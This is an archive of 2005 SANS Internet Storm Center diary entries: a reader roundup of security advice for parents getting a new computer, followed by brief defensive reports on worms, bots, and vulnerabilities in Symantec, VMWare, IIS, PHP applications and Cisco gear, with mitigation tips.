After a bit, I might try to persuade them to go LINUX, use openoffice, firefox, thunderbird, etc.  Security updates are posted as soon as they can be resolved and don't wait for a patch cycle on fixes for Zero-Day exploits.

From Anonymous:

If my parents recieved a new computer for christmas I would insist that they give it back.  I have spent years trying to educate them on the basic concepts of how to use a computer and they still struggle with the concept of 'right-clicking' for a list of options, they still do not understand how to send photos via email to Aunt whoever or how to save the photo of Uncle Joe that was emailed to them.

I find that many of my relatives that are 55 and older just have not had the experience with technology to intuitively understand it and these are the same ones with always-on high speed connections at home and no firewall/AV measures.  I spend many hours helping fix these issues for them only to find that after 12 months and the subscription runs out, they get confused by the nag screen asking for a renewal and never do it and end up compromised again.  Return to top of paragraph.

I hate this time of year....  My list of relatives that call me for help will increase with each new PDA, computer, and MP# player.

From Randy Nash:

I saw your post this morning asking what we'd tell our parents if they got a new computer for Christmas.  Last year I started getting calls right after Christmas from family and friends, prompting me to write my "New Years Security Resolutions" article (http://www.atriskonline.com/archives/00000037.htm)

While some of this may be somewhat dated, I tried to keep it generic and high-level enough to be useful over time.  Today I'd at least add a section on using a secondary browser such as FireFox.  I may also expand on the various tool listings for each category.  I hope you find this suitable.

From John Franolich:

This is easy on the windows home user...

UltraVNC is a nice remote app that can be customized to connect with your IP.  The executable, that the home user downloads, does not install as a service.  Also, it will time out after a few minutes if there is not any inbound connection. 

See http://ajaxtricks.blogspot.com/2005/11/put-geeksquad-out-of-business.html

and http://www.uvnc.com/addons/singleclick.html

From Bert Rapp:

I'd tell them to buy a Mac.  I've been telling everyone to buy Macs.

From Michael Varre:

Return it for a full refund. Then take the money and go on vacation for a few days :)

From Dan:

What I would tell my parents is:

Write down the Dell tech support number and keep it on the fridge.

P.S. That number should do ya for a year  :)  After that please feel free to call me.   Baahhhhh Humbug.

Oh, I may also share the basics of keeping their computer up to date with patches. A reminder every week or so in their calendar to double check their AV signatures and run a spyware scan also worked extremely well.

From Art McFadden:

If my mother-in-law were to get a new computer for Christmas, first, I would faint.  Then I would get ready to be bombarded with calls.

The first logical steps would to ensure the OS and drivers are up today and add some of my favorites.  Microsoft's anti-spywear program, Spybot Search and Destroy, and Girsofts free version of AVG antivirus.  From experience, I have found that people with expired antivirus programs allow them to lapse for two main reasons:

•  Money-  Will the computer still work?  Yes?  Well then why should I pay anything?  I won't get a virus.  (sounds like an incorrect similar line of thought I heard about from some less cautious fellow students in college ;-) •  Not informed-  We warn people constantly about fraud on the Internet, identity theft, and other white collar crimes.  Now they get a window asking them for credit card information.  Hopefully, they will call someone they trust before dismissing this as a scam to be enlightened.

If my father (the retired computer analyst/administrator) received a new computer for Christmas, I would ask him what the specs were and how does he like it.  After all, he is one of the people I call when I have questions.

Happy Holidays and stay safe.

From Tim:

Already happened...  In '98 us "kids" got together to get a pc for mom and dad.  Windows 98 with dialup AOL.  Put the usual Office suite, McAfee, Adobe, etc on the box.  Then came training day - ugh.  We very slowly went thru the power on, boot up, click the America Off Line button, listen to the modem dial, connect, verify the username, click No Thanks to their barrage of ads, then click the email icon.  I had already called my brother on the other coast to email jpg's of his kids.  We found the email waiting and explained how to view the attached photo's.  As soon as he was done reading the email, dad reached over and unplugged the pc from the wall - while still online.  In disbelief, I asked why he did that.  His reply:  "I was finished".  It took another week of constant tutoring before he could grasp the concept of disconnecting from AOL and shutting down the machine before powering down.  He was 70 then. 
Now he has broadband on a little celery 2 gig machine.  He still does email, but now his joy is printing color photo's of the fish his son catches.  He goes thru color ink cartridges pretty fast.  I worry about phishing attacks because he's a prime target.  I swing by and run spybot and adaware occaisionaly and so far, so good.
My neighbors are in their 80's and surf high speed all the time.  They are very pc savy and know about suspicious emails and using Firefox instead of IE, etc.  It just depends on their comfort levels.  Mom and Dad's machine is ripe for a zombie attack, while my neighbors are trusted surfers.
happy holidaze

From Wayne Smith:

What I told my mom over two years ago when she 'got a Dell'.

1) You will use alphanumeric passwords at least 8 chars long.  You will not use the same password for more than one account.  Your ISP email password should not be the same password you use for ebay, which should not be the same password you use for paypal.  Period.
2) You will have an anti-virus program installed and you will update it every time you are online.  You will get the new upgrade once a year.  Yeah, it's a pain on dial-up so just do it when you are done surfing each time, unless you haven't been on for a few weeks and then do it immediately before you surf the web or check email.
3) email... you will never forward, forward, forward something that simply has to go to all your friends.  Chili's and sear's aren't given away their money.  If you forward anything like that to me, I'm changing my email address and my name.
4) you will never, ever, for any reason, click on a link inside an email.  If you want to go to ebay, paypal, anywhere, you open up a new browser and type the URL in.  You look for the 'lock' and the https.  If it looks strange, don't trust it.  If anybody says your account has been hacked and click here, what do you do? Exactly
5) if you weren't expecting an attachment in an email, you don't open the attachment until you contact the person you know and ask them what it is and why and have them confirm they sent it.  If you don't know the person sending it, delete it and don't email the person.
6) Windows requires updating.   It's not an option.  When you are online, check for new updates.
7) you will have a separate, low limit credit card you use for online transacations.  You never send the number via email and unless you see https, the lock, and you didn't get any warnings about 'certificate', etc, you don't use it.
8) if something pops up on your screen, you'll read the whole message before clicking anything.

I'm a tech head and so is my wife.  My Mom is on the other side of the spectrum.  She's been computing safely for two years and only asks me for help when she needs to pull down a new copy of Norton once a year (hard on dialup).

From Dean:

If Mom and Dad actually bought a new computer, we would have miracle number one...
If I could talk them through installing the antivirus and firewall software, we would have our second miracle.
Now if, and this is a biggie...if I could get Mom and Dad to stop forwarding every single chain letter they receive, asking if it really is true, or warning me about...
This would be miracle number three, and I would consider myself truly blessed.

Happy Holidays to all!

From R. J. Brown:

My father is 84 years old, and has several computers already.  I tried to get him to switch to Linux, but the learning curve was too steep for him without my being able to be there physically and help him.  The only advice I would give him at this point is to be sure his anti-malware tools are working -- virus scanner, internal firewall, and spyware scanner.  He pretty well knows what he is doing by now.  He was involved with the early GE computers in the 1950's, and is a big reason why I am now a computer consultant myself!  Now my wife's mother?  If she got a new computer for Christmas, I would just tell her not to hook it to the internet!  ;-)

From Jim Halfpenny:

...I'd buy them a copy of Civilisation IV and tell them the Internet is expensive and overrated.

My parents do have a computer and use it only for web browsing. It's coming home with me this Christmas to have Linux installed on it. So long as it has Firefox and Solitare they will be happy. So long as it's not got pr0n dialers, spam relays, spyware, adware, DoS tools, viruses, trojans, worms et. al I'll be happy.

From David Hamilton:

I gave my parents a computer at Christmas a few years ago.  My folks have DSL. I installed a hardware firewall and virus protection immediately.  Later on, Firefox, anti-spyware and a pop up blocker all with training. I keep the "gift giving" going all year by talking to them about the bad stuff out there in terms that make sense to them.  I also trained them to ask me if they have questions or just don't understand. 

If I did it over, I would install hardware and software above all at once and train them throughout the year. 

From Kristina Harris:

I dunno about everyone else, but if my parents got a new computer for Christmas (without me getting it, in which case they would get it will all applicable updates, antivirus, and firewall software installed), it would go something like this:

*ring* *ring*


"Hi, honey, it's mom."

"Oh, hi mom."

"Say, I got a new computer, and I was wondering if ..."


" ... what's that?"

"No. Just No. You got it at Costco, didn't you?"

"Well, yes, but ..."

"And it has Windows, doesn't it?"

"I think so, but ..."

"Okay, do NOT plug in the computer until I come over with my  adware detector/firewall/antivirus CD."

"Well, I was just going to .."


" ... what?"

"I said no. No, no, no. Do NOT. Plug IN. The computer. Until I get there."

"Well, really, honey I was just ..."

"Mom, don't make me disable your DSL."

"Oh ... okay."

"I'll be over in a few minutes."

"All right honey, I guess I could wait for ..."

"Oh, and Mom?"


"If you decide not to listen to me, just remember: Wells Fargo does not outsource their emailing to a company in Uganda, and Paypal does NOT need to verify your information. Neither does eBay. And you don't need to click on that link to verify anything. Trust me."

"Oh. Are you sure?"

"Yes. Oh, and Mom?"

"Yes, honey?"

"Merry Christmas."


From Ron M:

"The question to you is, if your parents got a new computer for Christmas, what would you tell them to do?"

Return it. No kidding. There's just no hope that it'll stay updated and happy if they actually plug it in. An cuticle chainsaw would be a safer gift.

Have a good holiday, all!

From Anonymous:

I would tell them to _not_ connect it to the Internet, until I did a few things:
* many new motherboards have built-in RAID capabilities.
I would purchase a 2nd hard-drive, and build a "mirrored"
RAID ocnfiguration.  Then, if one hard-drive died, the other drive will become a backup, until I could replace the dead-drive, and re-enable the mirroring.
Yes, mirroring adds a one-time hardware cost, but it certainly is much easier for my parents than trying to teach them how to do routine backups.
* enable the Windows XP firewall *BEFORE* connecting the computer to the Internet, and then accessing Windows Update.
* download free software: MS Word Viewer, Adobe Reader, the GIMP (www.gimp.org), the latest Shockwave and Flash plug-ins.  Then, tell them that anytime that a pop-up window tells them to download or install something, just say "no", by closing the window, rather than clicking on the "NO" or "DECLINE" or "CANCEL" buttons insdie the window.
* of course, anti-virus software (www.my-etrust.com/microsoft) is an absolute essential.
* inventory the CDs and documents that come with the computer, to ensure that they have received everything that they are entitled to, and help them to store that bundle in a safe place.

Enough?  :-)

From Alan:

My advice to anyone receiving a new computer for Christmas:

1) Do not connect it to the Internet without an external hardware firewall.

2) Boot the machine and set a secure login password for admin / root and for the user account.

The following advice assumes it is a Windows machine

3) Before doing ANYTHING ELSE, perform a complete Windows Update. 

4) Launch Internet Explorer.  Download and install an alternative browser.  My choice is Firefox, but Opera is also a reasonable choice.  Then remove the blue e from the desktop and the launcher on the taskbar, and exit from IE.

5) Launch the alternative browser. Download and install Thunderbird for email.  Remove Outlook / Outlook Express from the desktop and the launcher taskbar.

6) Install a good anti-spam tool.  I like K9 from www.keir.net/k9.html.  Teach the new PC owner how to train the antispam tool.

6)  Download and install a personal firewall.  Unfortunately Sygate is no longer recommended because support has ended :-(  ZoneAlarm is ok.

7) Download and install the free grisoft AVG antivirus product.  Update it and set it up to scan nightly.

8) Go to housecall.trendmicro.com and perform a scan to be sure the machine is clean.

9) Give the standard lecture about not clicking on links in emails, not opening attachments, and being generally paranoid about unknown web sites.

10) If they insist on using instant messaging, install the latest version of gaim and remove icons for any IM tool supplied with the pc.

11) Install Startup Monitor and Startup Control Panel from http://www.mlin.net/.  Educate the owner about how to answer the popup questions that will occasionally be presented to them.

ALTERNATIVE to #3-11:  Install Ubuntu Linux or a similar user-friendly distribution.

From Anonymous:

If my parents got a new computer for Christmas, and it would be a laptop, I'll tell them to plug the thing in, turn it on, close it, put it on the floor, put the feet on it - and they'll have warm feet all day long ;-)

From Anonymous:

It's funny you sould ask; My parents ARE getting a new computer for Christmas. I steered them to a notebook so they could easily transport it between thier winter and summer places. That also means they can just bring it with them when they stop by my house and I can check it out.

From Anonymous:

Direct them to leave it in the box and bury it in the backyard. :)

From  Mike Lewis

My advice would be simple. Buy a MAC with the 3-year service and support contract, and then in 3-years, buy another MAC. The things my parents would do with a PC include e-mail, web browsing, paying bills on-line, and maybe saving digital pictures.

Why go through all the service, support, spyware, antivirus, free downloads ... crap available to Windows based PCs if all you want to do is e-mail, surf, and save pictures?!

From Brent Bice:

Interesting that you ask this as I've had this same scenario with several family members except not at Christmas. :-)

1.  The first thing I've recommended several times to the extended family is, go buy a router/firewall -- not just firewall software, but a separate network device. Yes, they've had their own set of issues but it's far harder and less likely that the malware du jour will disable a hardware firewall than any of the software firewalls that may be on a compromised PC. I also urge them to get the latest firmware updates for their new network router/firewall.

2. From behind the firewall, update the brand new machine with the latest recommended patches and all security patches from Microsoft.  Reboot. Rinse, lather, repeat until no more recommended or security patches are found.

3. Repeat step 2 with any software packages installed on the system and repeat as needed if any additional software gets installed.

4. Install Firefox and Mozilla and configure them to not trust cookies, have javascript off by default and to not load remote images.  Yes, Firefox and Mozilla have also had security bugs, but they've been fewer in number and usually less severe and less broad in scope than those found in MSIE and Lookout (er, I mean Outlook).  Tell the user to use firefox when possible, enable javascript only when absolutely necessary, and use MSIE only when absolutely necessary and only for trusted websites (like their employer's poorly designed website, for instance).

5. Uninstall unneeded software.

6. Install/update anti-virus software. Ensure it updates itself at least once a day.

7. Install/update anti-spyware tools such as (but not limited to) Spybot S&D, AdAware, the new MS Malware Removal Tool, etc.

8. Give a class (or two or three) on the care 'n feeding of anti-virus software, anti-spyware software, applying updates (ensure automatic-updates are on), recognizing phish, the risks of opening holes in the firewall or installing browser plugins/helpers, and generally install a bit of healthy skepticism about clicking on links coming via IM or email.

   Most of these require that I or another geeky family member pay a visit to help out. Oh well. It's usually good for a dinner and generally means far fewer of those REALLY painful attempts to walk someone through un-fscking their computer over the phone after it's been trashed by the MS Worm of the week -- especially if you're a unix geek like myself who hasn't kept up with all the changes to the windows desktop interface!

From Keith Rosenberg:

What would I tell my Parents?
- Antivirus software
- Firewall
- anti-spam capability
- Hardware firewall if they have broadband
- Keep OS and all software updated
- Provide phone and e-mail support
- Educate them about the internet's redlight district
- And finally, set up their computer for them if possible. That is what I did in one case.

From Anonymous:

Have them return it.

From Dave Rundle

'Twas the day after Christmas, when all through the house
we were gathered round the PC, examining the mouse;
The flat-panel LDC; speakers, so new and so crisp,
Displayed Microsoft Sam, with his usual lisp;

"Welcome to Windows," it intoned with a beep
Never warning that the Internet has more than one creep;
And mamma's logging in, and shopping like crazy,
Cause security issues make most people lazy,

When up on the screen there arose a quick popup,
A quick flash of the drive light, a really quick screw-up.
Away to the keyboard I flew like a flash,
Tore open the registry and cried "Where's the Patch!"

The new startup path was pointed to "Temp,"
Hmm, where the Internet cache is usually kept?
When, what to my wondering eyes should appear,
But a known key logger, to cause much fear

With an outdated driver, more useless than junk,
"Who hacked my computer; what little cyber-punk!"
More holes than had patches, who was to blame?
And he whistled, and shouted, and called them by name;

"Now, Microsoft! now, Borland! now, eBay and Spammers!
On, Oracle! on Apache! on, Mozilla and Hackers!
Who can guard my computer, who's the best of them all?
Who can do a good job, and not leave me to fall?

As Norton was loaded, and Mcafee started,
My guests grew tired, and soon they departed.
Loading up patches took most of the night,
And then the next morning, I had a new fight.

My adolescent son awoke before dawn
Frantic scrambles downstairs I heard as I woke with a yawn.
Cam Girls Live he'd found; a deviant site,
You won't meet him here, cause he's grounded for life.

Net Nanny I loaded, and then CyberSitter,
A whole lot of trouble caused by this little critter…
A new bunch of toolbars has just been installed,
And a DLL error, (the kid will get mauled!)

By the next week, I gave up, the computer reloaded,
40 hours of work, like the Matrix I coded.
Had I taken the time to prepare my Dell,
I would not be he sitting here inside malware hell.

From Anonymous:

I would do the same as I already did for my daughter (she got a 2nd hand PC as an early Christmas present) and install Ubuntu linux plus the codecs required to access some non-free audio and video.

Merry Christmas and a safe and prosperous new year to all the handlers.

From Anonymous:

If my parents had a computer for Xmas:

I would hope it is a Macintosh.

First and foremost because they easier to use, so less support calls...

But also because they are somewhat less prone to the on-going barrage of malware and viruses and all around pests that make computing such a pain.

If it is not a Mac, then I just got myself a free weekly dinner on Sundays...


Published: 2005-12-24

Parents and Computers

We compiled the information that many people sent to us over the past few days to answer the question, "if your parents got a new computer for Christmas, what would you tell them to do?"  The long list of ideas, poems, and thoughts are here.

From all of us at the ISC, we wish you the merriest of holidays and best wishes in the coming year!


Published: 2005-12-23

Bots: They are not just for Windows anymore.

Couple readers noted the use of the "kaiten" bot in some of the recent php exploits. The php vulnerability is used to install kaiten, which like all well behaved bots will connect to an IRC channel and do its master's bidding.

We kind of have come used to seeing "bots" as a Windows issue. But to be fair: Kaiten probably pre-dates a lot of the Windows worms and bot. IMHO: its so much easier to write a bot for Linux. You got perl after all. I wouldn't be surprised to find one written in bash.

On realy quick and dirty way to fool bots in Linux: make 'tmp' its own partition and mount it as non-executable. This will fool probably 80% of the bots, as they start out by writing themselves to /tmp. Don't forget to make /usr/tmp and /var/tmp symlinks. If you don't want to repartition: use a loopback file. Most Linux malware will compile itself on the target system. So removing development tools is always an option but a bit painful for many. And you may not be able to do without perl. I wouldn't be able to make coffee in the morning without it, and without coffee not much would be happening here.

We do get LOTS AND LOTS of reports about various php exploit attempts. Its one of these things where you are probably already long exploited if you are vulnerable. The exploit attempts target a long list of vulnerable php applications. Nothing particular fancy, just more and more of it.


Published: 2005-12-23

Getting Ready for the Holidays

We had a couple reports from readers, who tried to contact abuse departments or notify companies about breached systems, only to receive a "vacation" reply indicating that the systems are on autopilot until sometime next year.

Unless you turn off the systems, they will still need a bit of watching and caring. Do you have someone on call in case the burglar alarm goes off? Make sure you have someone checking the 'abuse' or 'security' mailboxes once a day (at least). You may have them even forwarded to a pager if you can filter the spam.

And while I am on the topic: Make sure you do actually have an 'abuse' and a 'security' alias for all of your domains. There are a number of aliases you should define for each of your domains:

RFC2142 provides a number of references to other RFCs, and suggests the following aliases:
  • postmaster@domain (RFC822). This should exist on all mail servers. You should also have postmaster@IP-Address-of-the-mail-server.
  • usenet@domain (RFC977). I know a lot of people will write to say differently. But I consider usenet dead for all practical purposes. You can probably do without this address.
  • abuse@domain
  • trouble@domain
  • noc@domain
  • security@domain
Take a look at your domain name and IP address whois entries and make sure they are current. For IP addresses, you may just find your ISPs contact info, which is fine as long as they notify you.

Spam to these addresses has become a problem. I don't think there is a great solution, as some of the mail sent to these mail boxes may include copies of spam messages (even if you don't send them, others may impersonate you and you still want to know. Abuse reports are one way you will find out).

I can't find a reference right now  (but I am sure someone will write with the correct RFC for it), but it is commonly suggested to also maintain a '/security' URL on all your websites. This URL should be used to provide contact information for security issues and information about security patches or such for any products you may offer. But this standard, while usefull, is not widely implemented (is it still a 'standard'?).

Last but not least: Have fun this weekend. I think I will run some network cable in my house (already got the big drill, but still need one more Home Depot trip for some conduit). The holiday security guide should be live sometime tomorrow. We got some great input.


Published: 2005-12-23

Update - Symantec RAR File Parser Remote Heap Overflow

 ISS X-Force's Symantec RAR File Parser Remote Heap Overflow analysis says "The likelihood of this vulnerability being leveraged by a worm is low as successful exploitation requires a very large RAR file, in the area of 35-40MB. Files this large are not generally passed by mail servers and can eliminate this as a vector for a worm. X-Force believes this is still a serious threat since the vulnerability can be leveraged to exploit AV mail gateways. Desktops which employ the on-demand scanning function could also be exploited without user intervention when scanning files downloaded by FTP or HTTP on the desktop."

Thank you for the information X-Force!

Symantec's announcement -
SYM05-027, December 21, 2005, Symantec AntiVirus Decomposition Buffer Overflow


Published: 2005-12-22

Santa IM Worm (bot) update

More details came to us on the Santa IM worm discussed earlier.  We were able to capture and examine the malware and found that is hosting it.  When executed, gift.com resolves smtp.girlsontheblock.com to and attempts connections to tcp/53.  If we discover more details we will issue further updates.

Further info:  gift.com renames itself to c:\windows\winrpc.exe, and sets itself up as the service "Windows RPC Services".  There is no rootkit built in, it is totally dependant on download instructions from the command and control site.  Rather than calling it a "worm" as was reported in the press, a more accurate description is that it's a bot with replicating capabilities.  Digging a bit deeper into the code, we found that it was also likely compiled/pushed to the distro point on 2005-12-18 18:09:11.000000000 -0500.


Published: 2005-12-22

Exploits in the wild for several PHP-based web apps

Those of you that run web servers have probably noticed in your logs that there is a lot of scanning activity looking for vulnerabilities in PHP or web applications that are written in PHP.  Even after all these months there are still scans for the old awstats vulnerability and the XML-RPC vulnerabilities in PHP itself from a few months back.  Well, there are a couple of new ones in the last week or so that I thought deserved a mention.

Several days ago Secunia issued a bulletin discussing a new vulnerability in phpBB-2.0.18 (which is the latest one and which, unfortunately, has been a pretty popular target over the last year or so).  Fortunately, the vulnerability can only be exploited if a couple of settings are changed from the default to values that will open your web server to a lot more problems than just this one.  Having said that, the exploit is now in the wild, so if you are running phpBB, make sure that you follow the recommendations and that "Allow HTML" and register_globals are both disabled.  One of our intrepid readers also noticed that an exploit has been posted in several places that will do brute force dictionary attacks to get the passwords of phpBB users.

Also, a couple of days ago a worm started making the rounds exploiting a vulnerability in the genealogy application PhpGedView.  The authors have posted patches here which users are encouraged to apply as soon as possible.

Jim Clausing, jac /at/ isc.sans.org


Published: 2005-12-22

Help us out with a Christmas story

With the holidays coming up this weekend, we're looking for some input from our readers on a story we'll publish on Saturday.  The question to you is, if your parents got a new computer for Christmas, what would you tell them to do?  Please send your ideas to the handlers through the contact page and we'll summarize.


Published: 2005-12-22

Update on the SUS issues

We told you about issues with Microsofts Software Update Service (SUS) version 1 last week.  Yesterday, Microsoft released yet another update to their Approval Analyzer Tool.  They also updated Knowledge Base article 912307 to version 5.  Anyone still having problems with SUS after this month's updates should take a look at the updated article and tool.  Note that version 2 was not affected by this issue.  Thanx to several of our faithful readers including Juha-Matti for bringing this latest update to our attention.

Jim Clausing,  jclausing /at/ isc.sans.org


Published: 2005-12-22

Santa IM Worm

One of our attentive readers sent us a note yesterday and we missed posting it in the diary.  There's a nasty present waiting under your IM tree if you have been naughty this past year.  Read on...

Techweb -

"A new worm posing as a come-on to a Santa Claus site is traveling across all the major instant messaging networks, a security firm warned Tuesday, and when recipients visit the bogus site, they're infected with a file hidden from sight by a rootkit. IMlogic said that the worm, dubbed "M.GiftCom.All," is circulating on the MSN, AOL, ICQ, and Yahoo instant messaging services, is a "Medium" threat, a relatively rare classification for the Waltham, Mass.-based company. Most IM worms and Trojans listed on its Threat Center receive only a "Low" classification. Like virtually all IM worms, M.GiftCom.All includes a URL in messages it spams out to contacts hijacked from previously-infected PCs. When users naively visit that site -- which is billed as a harmless Santa site -- a file is automatically downloaded to their computers. The file, usually named "gift.com" includes rootkit elements that cloaks it from security software. In addition, the downloaded executable tries to disable a number of anti-virus programs, adds a keylogger to the system to capture confidential information, and then spreads to others by snatching names from the user's IM client contact list..."

IM Logic

"...Description: This worm broadcasts a URL out over IM clients which downloads an executable file, often named gift.com. When this file is executed, it hides itself and scans the registry, file system, and internet cache. By operating as a rootkit, the process is hidden from all tools and anti-virus software. It also attempts to shut down anti-virus software and makes several networking calls. Also it does keystroke logging and may attempt to propagate itself over IM clients..."


Published: 2005-12-21

* VMWare vulnerability announced and fixed

A report showed up on the bugtraq and vulnwatch mailing lists in the last few hours about a vulnerability (discovered by Tim Shelton) in a number of VMWare products (including Workstation, GSX, ACE, and player), that would allow the attacker to escape the virtual machine and execute code in the underlying host OS.  There are new builds which correct the issue (VMWare Workstation 5.5 is now up to build 19175, e.g.) dated 20 Dec on their website, and the bulletin has a timeline section that states that VMWare acknowledged the vulnerability when they released the new builds.  This one is pretty significant for folks who use VMWare for malware analysis or even to isolate/sandbox their web browsing and you are urged to update to the latest build or disable NAT as soon as possible.  From looking at the bulletin, it appears that Mr. Shelton has created a Metasploit module to exploit this vulnerability.

The vulnwatch article is here.
The Secunia advisory is here
VMWare's response is here.

Jim Clausing, jclausing at isc.sans.org


Published: 2005-12-21

Symantec AV RAR library vulnerability

Yesterday, Alex Wheeler released details of a vulnerability that appears to span many Symantec A/V products in the routines for decoded RAR compressed files.  Symantec is apparently working feverishly on a fix, but for the moment the recommendation is to disable scanning of these files (which I suppose is fine if we can convince the users not to open/uncompress them until Symantec has a fix or they can be scanned by some other A/V product) or block them completely at gateways/proxies.  We are not currently aware of exploits in the wild, but the concern is that this has occurred so close to the end-of-year holidays, even if a fix does come out in the next few days, will people be around to apply it.

For complete details see, the Bugtraq posting, the Secunia advisory, and what I believe is Alex's paper.

We'll bring you more info as it becomes available.

Jim Clausing, jclausing at isc.sans.org


Published: 2005-12-21

Updated RSS Feed

We updated the RSS feed from 0.91 to 2.0 this morning, and added partial diary content in addition to the headlines. There are a couple of reasons why we did that:
  • RSS 2.0 should now be understood by most aggregators. When we originally started offering the RSS feed two years ago, RSS 0.91 was the most commonly used standard.
  • RSS 2.0 allows us to include a 'TTL', which indicates to the RSS reader how frequently to refresh the feed. Lets see if this helps a bit with overly busy readers
  • We do get regular requests to include full diary content.
For a lot of readers, RSS has become the way to go to stay up to date. However, from a web site operator point of few, RSS does have a couple of problems. The "pull" nature of RSS can cause high loads to the side, even if nothing actually changed, as the RSS readers keep polling the site for updates. For example, yesterday we had about 12,000 different IPs accessing our RSS feed, polling it 250,000 time. So thats about 20 "polls/user/day".

Now the advantage is of course that the RSS feed is a static page, and doesn't take a lot of resources to serve.

Another problem with RSS feeds is less technical: The ISC site does not want to be just a "news feed". In order to work, we do need you to interact with the site, and support us by providing reports about incidents and other feedback. Using an RSS reader will remove you from the actual site and lead to a more passive use. This is one reason why we will not offer full content of diary entries. For now, I added a "teaser" (first 100 characters). A technical problem with adding diary content is the fact that we have to strip links and characters that are not supported by the RSS standard.

Special note for Firefox users: You may see an odd character at the beginning of each headline but the first two. This is due to the fact that there is a new line at the start of each subject. For now, this is necessary to support the "iscalert" taskbar application. The feed is valid according to the validators I checked, so as far as I am concerned this is a bug in Firefox.

And don't forget that you can always get alerts of new diaries via e-mail: sign up here


Published: 2005-12-20

Finding abuse contacts for a domain

    One poster to the handlers list asked if there is an easy way to find the abuse contact for a domain.  Abuse.net maintains a database of abuse contacts that's reachable via a web link or dns or whois lookup.


Published: 2005-12-20

Cisco EIGRP Vulnerability and VLAN spoofing issue

Cisco has put out advisories today concerning vulnerabilities in their EIGRP and VLAN implementations.  Their EIGRP post can be found at:
and the VLAN issue is at:


Published: 2005-12-20

Malware Analysis Quiz 5 results

For those following my Quizes, today I released the results of the Malware Analysis Quiz 5.
That one was really great and I would recommend those interested in malware analysis to read them!
Now, I will take a break of it until january and will post new quizes on 2006!
Thanks a lot for all submitters!
Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2005-12-19

IIS 5.1 DoS exploit released

A Denial of Service (DoS) exploit against IIS 5.1 was brought to our attention. Source code of the exploit is being distributed from multiple sites. The claimed effect of the exploit is to stop the inetinfo.exe process.

We have warned Microsoft and are awaiting a reaction from them.

Confirmation the code works and/or snort IDS signatures will cause updates to this story as we get them.

The smartest mitigation strategy at this point is to plan an upgrade to the most recent version of IIS.

Swa Frantzen


Published: 2005-12-19

Malware samples

It seems there's somewhat of a peak of reports on malware that scans for vulnerabilities that is currently not detected by the Anti-Virus products.

If you have samples of the malware, our malware team can have a look. You can upload them through our contact form.

Swa Frantzen


Published: 2005-12-18

Wrap-up: What? No Link?

Our handler John Bambenek, in hisdiary from December 7th, noted the dangers of posting URLs, in particular clickable URLs, on our site. To drive the point home, he added a "suspect" URL, and we tracked how many people clicked on it.We had about 1,000 users click on the link. 80% used the same browser they used to read the diary, so I consider them "production browsers". 10% used "safe browsers" like wget. The remainders are bots/search engines that followed the link.Most people who responded to the diary noted that they do need access to malicious code (and malicious URLs) in order to be able to block them at their web proxies, or that they use safe browsers to access suspicious links. We will continue to post links in our diaries. It is up to the particular handler to decide if it is appropriate to obfuscate the URL, post a partial URL, or not post it at all if it is deemed not appropriate or too risky.


Published: 2005-12-17

Artemis Project's N-Eye

While checking out the Chinese Honeynet Project, I happened upon their tool N-Eye:

It looks fun.


Published: 2005-12-17

On Dasher

Despite efforts to cut off the distribution points (http://www.honeynet.org.cn/honeyneten/index.htm) new versions of Dasher continue to pop up.  Symantec identified Dasher.C yesterday that added an anti-security-software payload (your typical disable anti-virus and firewall type of gig.)  New versions with new distribution points, and signature-evasion changes continue to come out.  Before you ask: "which ones don't detect it?"  Right now, it's most of them.  In a few hours, I hope that list to be much shorter.

It would be simply swell if the AV developers would write sigs for the samples that we're sending them.  I know it's a weekend... but I'm working.

So, why is Dasher "finding-legs?" or why is it successful? 

To answer that, we have to ask Microsoft: why are services listening on ephemeral ports?  Or, why are some filtering/firewall strategies blocking only 1024 and below?

Overall, the response procedure appears to be working.  The 1025/TCP scans were detected, packets were gathered, the vector was identified, examples of the code were captured, and command-and-control points were neutralized.  Everything went according to plan-- just not quickly as I hoped.

Now, I'm waiting for Prancer.


Published: 2005-12-16

Visualization of Dasher worm

The honeynet folks sent us a link to their research on the MSDTC exploit that is attacking TCP port 1025 (the Dasher worms).  This is very interesting stuff, especially if you like statistical analysis:


Published: 2005-12-16

Hotmail and MSN problems

Looks like Hotmail and MSN are having problems receiving mail from specific Internet Service Provider networks.  They are blaming the problem on high mail volume, partly due to the Sober worm.  More information here: http://www.msnbc.msn.com/id/10301008/


Published: 2005-12-15

New Beagle on the war path

A new Beagle/Bagle variant is making the rounds. It comes in an almost empty email, as a ZIP attachment containing the worm as an EXE. The attachment name, email subject and sole text content of the email all seem to be male or female names. Keep your eyes peeled, especially if your users are reading their mail over webmail, as it seems to take another couple of hours until the AV vendors have their patterns lined up.

Update 23:10 UTC:  It took most of the AV vendors their sweet time to get the patterns out for this one. Now things slowly start to look a bit more cheerful, though we know of at least one vendor where the Beagle/Bagle attachment still sails right through the filter, even though the vendor website claims that protection is in the current pattern. If you are not yet anyway already blocking all .exe (and .exe within .zip) on your email gateway, days like today should maybe make you reconsider.


Published: 2005-12-15

If MS05-054 doesn't apply correctly...

Shinil Hong of SUNY Buffalo has sent us his analysis of problems encountered with the installation of MS05-054. Here's what Shinil found out:  The cumulative Internet Explorer patch fails to install when ProgramFilesDir value in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion registry key points to a manually changed drive letter that is different from the default %SystemDrive%\Program Files path (e.g. C:\Program Files). The U.S. distribution versions of Microsoft Windows Server 2003 and XP ship with MS Internet Explorer 6.0 installed by default in %SystemDrive%\Program Files\Internet Explorer\ directory. If the ProgramFilesDir registry value points to D:\Program Files, for example, while the actual program directory of MS Internet Explorer is C:\Program Files\Internet Explorer, the patch installer will attempt to update the empty D:\Program Files\Internet Explorer directory and fail eventually.  For a solution, change the registry key back to the default while applying the update. 
[Note: This problem description and resolution has not yet been verified by SANS ISC]


Published: 2005-12-15

LAND attacks against network devices

A "LAND" attack involves IP packets where the source and destination address are set to address the same device. Older variants, as reported http://isc.sans.org/diary.php?date=2005-03-07 earlier, rely on the source address to be spoofed to the same value as the destination IP.  A recent post to Bugtraq came up with a new twist: LAND attacks against routers and perimeter devices, addressed to the outside interface and with the source spoofed to the inside interface. Rumour has it that these attacks are easily conducted and surprisingly "successful".  The defense, though, is just as simple: Packets with spoofed source addresses have no business entering your perimeter networks. If you have not yet applied ingress filtering on the outermost devices of your internet connection that you have control over, now is a good time to do so. RFC 2827 and RFC 3704 are good sources of information on ingress filtering and Reverse Path Forwarding. And while you're at it updating your filters, dont forget to apply outbound spoofing filters as well - see this paper in the SANS Reading Room for details.


Published: 2005-12-15

MS05-051 (MSDTC) Malware / Port 1025

